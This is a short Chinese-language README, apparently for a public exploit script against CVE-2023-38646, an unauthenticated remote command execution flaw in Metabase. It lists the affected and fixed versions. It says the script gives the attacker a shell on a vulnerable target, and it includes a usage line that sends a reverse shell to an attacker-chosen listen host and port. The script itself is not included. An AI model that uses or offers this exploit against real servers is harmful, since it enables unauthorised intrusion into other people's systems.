Metabase 开源版 0.46.6.1 之前版本以及 Metabase Enterprise 1.46.6.1 之前版本允许攻击者以服务器的权限级别在服务器上执行任意命令。利用该漏洞无需身份验证。其他已修复版本包括 0.45.4.1、1.45.4.1、0.44.7.1、1.44.7.1、0.43.7.2 和 1.43.7.2。
如果目标 Metabase 版本存在漏洞,此脚本将允许你作为攻击者在目标系统上获取 shell 连接。
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

作者: @birdm4nw